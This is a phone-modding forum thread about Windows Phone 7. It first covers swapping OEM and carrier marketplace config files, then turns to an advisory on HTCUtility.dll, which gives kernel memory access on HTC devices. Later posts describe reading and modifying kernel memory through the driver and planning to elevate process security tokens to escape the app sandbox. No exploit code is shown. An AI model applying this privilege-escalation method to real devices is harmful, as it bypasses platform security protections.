CAN I ACCESS MORE THAN ONE OEM MARKETPLACE AT ONCE?
No, sorry. I tried to build support for multiple OEM markets, but it didn't work. The last one overwrites the previous.
WILL APPS KEEP WORKING AFTER THE MARKETPLACE REVERTS?
So far, yes. I don't know whether they'll get updates, although I suspect they will.
CAN SOMETHING BE DONE ABOUT APPS COMPLAINING THEY DON'T WORK ON MY PHONE?
Sadly, no (nothing safe). Most of the LG and Samsung apps that I've tried work just fine (interop aside) on my HTC phone. It helps that in Mango, a lot of formerly interop capabilities (like compass for LG ScanSearch) are now in the official APIs. Some apps will still check though, and there's nothing I can do about that.
CAN WE ACCESS MARKETPLACES FOR OTHER OPERATORS?
It's probably possible, but I haven't bothered to try yet. If there are interesting apps for carriers that work outside of that carrier's network, I'll give it a shot. It's a different file but the structure is very similar.
IS THERE A LIST OF APPS KNOWN TO WORK?
Courtesy of user JusThinK, as of 1 Feb 2012:
JusThinK said:
Converter
FunShot
HTC Hub
Look n Type
MiniDiary
Notes
Now
Photo Enhancer
Photo Studio
Photo Stylist
Photogram
ScanSearch
SmartShare(previously know as Play To - Working fine on with my Samsung HDTV)
ToolBox
Click to expand...
Click to collapse
can you just deploy all three and have access to all 3 sources in marketplace?
once you install apps from the other oem sources, and the market reverts back, do you lose the apps you have installed?
No. I tried to build it so you could access multiple OEM marketplaces at once, but it didn't work - only ever used the last one in the config file.
Apps stay installed and runnable even after the marketplace reverts. However, I can't promise they'll receive updates. I think they will, but I haven't been testing this long enough to find out.
Dell's marketplace string is "Dell"
Nokia's marketplace string is "Nokia"
I still haven't figured out Fujistu's.
thanx dude,
The 3 xap files are working on the HTC Trophy.
But the LG apps that you can download, if you run the downloaded app from LG place. He said Only for LG devices.
So are you editing the files in the 'keepers' folder? I had found those some time ago and posted them HERE back in October. I thought they would lead to this since when they were deleted the OEM marketplaces would simply go away, same can be done to remove the carrier marketplaces, but I had trouble getting them off my device to really look at them.
Be warned though in my similar pre-mango hack with the registry we found that changing the OEM marketplace values made the DRM wig out and would prevent any apps from starting. The only way to fix it was a full reset or restore to a point before the modifications were done.
I would guess that if you edit LKG_MOStoreConfig.xml you could do the same thing with carriers.
OEM's:
Samsung
HTC
LGE
Dell
Nokia
MO's:
Att
Tmous
Tmode
I am pretty sure these are case sensitive too so keep that in mind.
Thanks GoodDayToDie
this solution it gives me solved my phone not show OEM App in market
Just wondering and perhaps some people might want to test with me if we set LKG_MOStoreConfig.xml and LKG_OEMStoreConfig.xml to read only will it stay set instead of only lasting a few days?
The reason I want this is becuase I want at&t's stupid marketplace entry to remain GONE so I edited LKG_MOStoreConfig.xml to this:
Code:
<ConfigurationFile version="1">
<MOStore>
<setting id="MOName"></setting>
<setting id="MOStoreName"></setting>
<setting id="MOStoreID"></setting>
<setting id="MOStoreEnabled">False</setting>
</MOStore>
</ConfigurationFile>
Now I'm just guessing that this is how it should look since like I said before I never could get the original files off my phone to look at them.
@voluptuary: That would probably work (in fact, the "false" alone is probably enough). Marking the file read-only may or may not be sufficient.
@cyclonemon: You're welcome! I didn't even realize people were having that issue but yes, it should help there too.
I am confused, can't I do this already with Milkman's WP7 3MktPlace? I can search/list 3MktPlace apps . I can add new info such as Nokia to the application. It finds and saves the XAP to the PC and from which I can deploy it to the phone.
ok, after reading more carefully, the program process above would require interop unlock, your route doesn't
@voluptuary (again): Thanks for the OEM names. I'm pretty sure I tried "Nokia" and it didn't work, but I'm trying it again (I did the edit on the phone during testing, and that's pretty typo-prone). For what it's worth, they are not case sensitive (a good thing, since the official casing for Samsung is actually SAMSUNG).
EDIT: Confirmation, "Nokia" does not work.
You're exactly right about which file I'm replacing (you can see that if you crack the XAP). I was looking to use the embedded provxml in MOConfig to do interop-unlock, but it looks like the process which reads that file doesn't have the required permissions. I could do something for the MO marketplaces too, but I'm really not sure there's value to it; do the MOs have apps that are useful if you're not a subscriber?
So far, no DRM wig-outs. I'm hoping it works when I don't mess with the registry. We shall see.
@derausgewanderte: This method doesn't use up unsigned app limit (aside from briefly, when the configuration app is installed). It also allows updates from the phone itself.
GoodDayToDie said:
@derausgewanderte: This method doesn't use up unsigned app limit (aside from briefly, when the configuration app is installed). It also allows updates from the phone itself.
Click to expand...
Click to collapse
I see, thanks for the clarification.
just for your info. Milkman's program works with "Nokia" if that helps.
Thanks, but... neither "Nokia" nor "Dell" are working. It's rather annoying. Samsung I had the actual file to work from, but LG[E] I figured out on my own, and it works. Not so with Nokia or Dell though.
Nokia on the marketplace has the string nokia.
As this seems a nice hack, be very carefull with changing the OEM name of your phone. Doing this a couple of times will invalid something with the DRM and will force you to do a hard reset. You will not be able to run any app installed trough the MP otherwise and you will not be able to install anything.
I dont know for sure if the same thing would happen trough this method, but I'm not going to try it out. I tried it with editing the registry and if you do that about 5 times, your phone cant do anything without a hard reset.
I'm posting this to avoid problems, not to kill this hack. Because its defenetly good work, but before any complications arise, be warned.
Marvin_S said:
Nokia on the marketplace has the string nokia.
As this seems a nice hack, be very carefull with changing the OEM name of your phone. Doing this a couple of times will invalid something with the DRM and will force you to do a hard reset. You will not be able to run any app installed trough the MP otherwise and you will not be able to install anything.
I dont know for sure if the same thing would happen trough this method, but I'm not going to try it out. I tried it with editing the registry and if you do that about 5 times, your phone cant do anything without a hard reset.
I'm posting this to avoid problems, not to kill this hack. Because its defenetly good work, but before any complications arise, be warned.
Click to expand...
Click to collapse
Yes yes please heed this warning. It happened to me.
I'm aware of the problem with the registry editing method. I can't guarantee it won't happen here (make sure you have a recent backup!) but I'm hopeful. I've made far more than 5 changes, and while I haven't had it in this state for weeks yet, I have for days, and so far no problems at all.
EDIT: @VoodooKing: Just to confirm, your problem was with the registry tweak method, right? If you hit that problem with these XAPs, please let me know.
GoodDayToDie said:
@voluptuary (again): Thanks for the OEM names. I'm pretty sure I tried "Nokia" and it didn't work, but I'm trying it again (I did the edit on the phone during testing, and that's pretty typo-prone). For what it's worth, they are not case sensitive (a good thing, since the official casing for Samsung is actually SAMSUNG).
EDIT: Confirmation, "Nokia" does not work.
You're exactly right about which file I'm replacing (you can see that if you crack the XAP). I was looking to use the embedded provxml in MOConfig to do interop-unlock, but it looks like the process which reads that file doesn't have the required permissions. I could do something for the MO marketplaces too, but I'm really not sure there's value to it; do the MOs have apps that are useful if you're not a subscriber?
So far, no DRM wig-outs. I'm hoping it works when I don't mess with the registry. We shall see.
Click to expand...
Click to collapse
Yeah, I can't get Nokia to work either, however my Lumia 800 never had a "Nokia Marketplace" to begin with on the phone so that may have something to do with it. I think the other programs that have been mentioned are pulling apps in a slightly different way than what acctually happens on the phone. I would guess pehaps there is some handset ID matching or something on the phone marketplace whereas with the PC/Web based methods there isn't. (just guessing)
On a side note I tried setting the MOConfig to read only (like I said before) and while att's marketplace still sadly came back, it came back different. It used to be "AT&T AppCenter(tm)" now it reads "AT&T Featured" so that is odd. As for carrier app usefullness IMHO the at&t ones are garbage but I can't speak to any other carriers.
You have to search for Nokia apps in the marketplace for them to show up. There is no Nokia store.
Yes changing registry a few times caused my phone to not launch apps and install from marketplace. I think I changed the name more than 5 times.

HTCutility.dll used for direct access to TCB chamber

As it is known that HTCUtility.dll will provide complete, unrestricted access to the TCB chamber on HTC devices, can this be used to unlock (at any level) the OS?
I have not heard anyone speaking of it and exists on my HTC Arrive. Seems to be a bypass for unrestricted access to anything within HTC devices.
I am looking at it myself, but thought I would share.
See details here...
http://labs.mwrinfosecurity.com/files/Advisories/mwri_htc-htcutility-kernmem_2011-11-10.pdf
Your link is down
very interesting but you link is down so please fix it so I can take a look. I too have a HTC arrive and have been working on an unlock.
Don't know what happened to the link.
Here is the link to the google docs version.
https://docs.google.com/viewer?a=v&...1C1HkN&sig=AHIEtbTwK-r8RyAyFmt1ai119m7EVAqsNA
-Paul
This looks promising, I'd like to know if what's written there is true ...
The paper is a couple months old, so it *could* have been patched by HTC... but hey, it also might not have been! This bears investigation post-haste.
It's easy enough to use this to execute some arbitrary code at high permissions, which is certainly useful as-is (do things like unrestricted registry and filesystem access). The real potential of it, though, is to turn off the security restrictions for specific apps. Essentially, get the benefits of a "fully unlocked" ROM but on a stock ROM, and only for the apps you specify.
One thing to note here: this is still going to require an interop-unlocked phone. It's opening a handle to a driver, and just like everything else that does so, it needs ID_CAP_INTEROPSERVICES. This is great news for owners of interop-unlocked/unlockabe phones (since this makes interop-unlock useful again) but probably doesn't help on 2nd-gen phones or on the Arrive (unless you want to roll back to NoDo, in which case this can probably be used to make an interop-unlock that works on Mango, though it wouldn't be easy).
I hope some one gets this working for the Arrive ASAP
Oh this was talked about a while back. It was patched back in NODO
Really? The paper is from only 3 months ago (assuming USA numeric date style, 2 months otherwise). You don't typically publish security advisories for things that were patched more than 6 months prior.
In any case, HTCUtility.dll still exists on my phone. No idea yet if that IOCTL still works, though. I'll try it out in any case, and report back.
For those asking about it for the Arrive though, you're likely out of luck even if this works. It is *not* a way to interop-unlock a phone, and it is *not* a way around interop-unlock. It's a way to do more things on an interop-unlocked phone. You can't even reach a driver (which is what HTCUtility.dll is) unless your app has ID_CAP_INTEROPSERVICES - that's what the capability is actually for, accessing drivers - and you can't install a homebrew app with that capability unless interop-unlocked (or on pre-Mango).
GoodDayToDie said:
I'll try it out in any case, and report back.
Click to expand...
Click to collapse
Thank you
GoodDayToDie said:
Really? The paper is from only 3 months ago (assuming USA numeric date style, 2 months otherwise). You don't typically publish security advisories for things that were patched more than 6 months prior.
In any case, HTCUtility.dll still exists on my phone. No idea yet if that IOCTL still works, though. I'll try it out in any case, and report back.
For those asking about it for the Arrive though, you're likely out of luck even if this works. It is *not* a way to interop-unlock a phone, and it is *not* a way around interop-unlock. It's a way to do more things on an interop-unlocked phone. You can't even reach a driver (which is what HTCUtility.dll is) unless your app has ID_CAP_INTEROPSERVICES - that's what the capability is actually for, accessing drivers - and you can't install a homebrew app with that capability unless interop-unlocked (or on pre-Mango).
Click to expand...
Click to collapse
Yeah I think it was mentioned here on XDA and it was believed to already have been patched.
I think by "patch" they mean that Interop was restricted as of Mango, thereby securing this exploit, in Mango. But for those that are Interop unlocked, this should still grant full access to everything else.
Just my observations. I have an Arrive and am not Interop unlocked yet, so I can't test it.
Looking at the hand-free provisioning to see if I can find a way to leverage that....
-Paul
It works. I successfully opened a handle, read a kernel-mode memory address, modified it, confirmed the modified value, and restored it.
Next trick: finding something really useful to change. Ideally, probably the process security info - if I can simply elevate a given process to full permissions, then I'm golden.
Will share code soon. If somebody knows where I can find the important part of the process info, let me know - I have a little familiarity with NT process contet blocks, but none with CE ones (if it even uses such a structure).
GoodDayToDie said:
It works. I successfully opened a handle, read a kernel-mode memory address, modified it, confirmed the modified value, and restored it.
Next trick: finding something really useful to change. Ideally, probably the process security info - if I can simply elevate a given process to full permissions, then I'm golden.
Will share code soon. If somebody knows where I can find the important part of the process info, let me know - I have a little familiarity with NT process contet blocks, but none with CE ones (if it even uses such a structure).
Click to expand...
Click to collapse
All the information looks like it is in the advisory. KDataStruct is what you want. That is equivalent to the PEB in Windows CE.
GoodDayToDie said:
It works. I successfully opened a handle, read a kernel-mode memory address, modified it, confirmed the modified value, and restored it.
Next trick: finding something really useful to change. Ideally, probably the process security info - if I can simply elevate a given process to full permissions, then I'm golden.
Will share code soon. If somebody knows where I can find the important part of the process info, let me know - I have a little familiarity with NT process contet blocks, but none with CE ones (if it even uses such a structure).
Click to expand...
Click to collapse
Can you confirm this works only on already Interop Unlocked device ?
Thx for your efforts.
Could htclv.dll be helpful in setting security on an app? It supports the following functions:
LVModInitialize LVModUninitialize LVModAuthenticateFile LVModRouting LVModAuthorize LVModGetPageHashData LVModCloseAuthenticationHandle LVModGetHash LVModProvisionSecurityForApplication LVModDeprovisionSecurityForApplication LVModGetSignerCertificateThumbprint LVModSetDeveloperUnlockState LVModAuthorizeVolatileCertificate LVModGetDeveloperUnlockState
In particular the "Deprovision Security for App" and "Get/set DeveloperUnlock" or maybe "Authorize Volatile Certificate"....
Or maybe htcpl.dll which seems to be the HTC policy engine interface. Supports:
GetFunctionTable PolicyCloseHandle PolicyEngineInit PolicyRuleAbortTransaction PolicyRuleAddRawData PolicyRuleBeginTransaction PolicyRuleBuildRawData PolicyRuleCommit PolicyRuleCommitTransaction PolicyRuleCreate PolicyRuleDelete PolicyRuleFindFirst PolicyRuleFindNext PolicyRuleGetInfo PolicyRuleOpen PolicyRuleParseRawData PolicyRuleReadRawData
These all look good to modify the security policies on HTC, assuming Interop-Unlocked.
-Paul
@dragonide: Confirmed, this requires interop-unlock since the very first step is opening a handle to a driver.
@Paul_Hammons: The LVMod functions look quite interesting indeed. Where are you getting these functions from (straight out of the DLLs, or some doc somewhere, or decompiled code, or...?), are they user or kernel entry points, and what permissions do they require? The ability to modify app security doesn't do as much good if you already have to be high-privileged to call it, though it might simplify my current goal.
@n0psl3d: Cool, I'll get to work on it.
@n0psl3d: KDataStruct contains kernel information, but I'm pretty sure what I need is in a PROCESS struct (such as is pointed to by pCurPrc). The problem is, I can't find any documentation for that struct. I'm searching online but so far coming up empty. CE doesn't seem to use PEBs or TEBs as I've seen them on NT (not terribly surprising, but annoying).
EDIT: I'm downloading the Embedded CE toolkit, which comes with source code. It'll take a while but hopefully that will have what I need.
OK, digging through the CE source I've found some interesting things. No idea if this will work yet; it'll be exciting just to make it compile.
PROCESS struct -> hTok (handle to a Token) -> phd (PHDATA, pointer to the handle data) -> pvObj (PVOID to the actual object, which is probably a TOKENINFO) -> psi (pointer to ADBI_SECURITY_INFO) -> contains the actual ACLs and privileges, and can be created from an account ID.
Probably the easiest option is to find a relatively high-privilege process and clone its token or some such. Token re-use (if I increment the reference count, this should work) may be easier. Modifying an existing token might also be doable.
Anyhow, I'm not going to have this finished tonight, but it'll get there. For those wondering wht you can do with this, it basically breaks you out of the sandbox entirely. You can call any function, access any resource, etc. that is available to a userland process (executing in kernel mode is also possible but trickier). Practically speaking, this makes all the other high-privilege COM DLLs useless - instead of ComFileRW, just use the file IO methods (anywhere you want), instead of DMXMLCOM just call ConfigProvXml directly. Even things like launching native EXEs directly should become possible (run those Opera ports on a stock ROM, for example).
I'm sorry, I still don't know what any of that means. But it sounds good! I wish I knew how to do this kind of stuff. Thanks for all of your work!

Categories

Resources